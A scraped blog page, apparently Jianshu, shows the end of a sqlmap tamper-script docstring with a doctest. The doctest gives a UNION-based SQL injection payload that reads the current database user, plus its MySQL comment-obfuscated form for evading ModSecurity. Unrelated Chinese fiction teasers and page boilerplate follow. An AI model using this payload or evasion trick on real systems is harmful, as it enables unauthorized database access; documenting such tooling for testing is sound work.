        * Used during the ModSecurity SQL injection challenge,
          http://modsecurity.org/demo/challenge.html

    >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
    "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
    """

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,717评论 6 496
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,501评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,311评论 0 350
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,417评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,500评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,538评论 1 293
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,557评论 3 414
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,310评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,759评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,065评论 2 330
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,233评论 1 343
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,909评论 5 338
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,548评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,172评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,420评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,103评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,098评论 2 352

推荐阅读更多精彩内容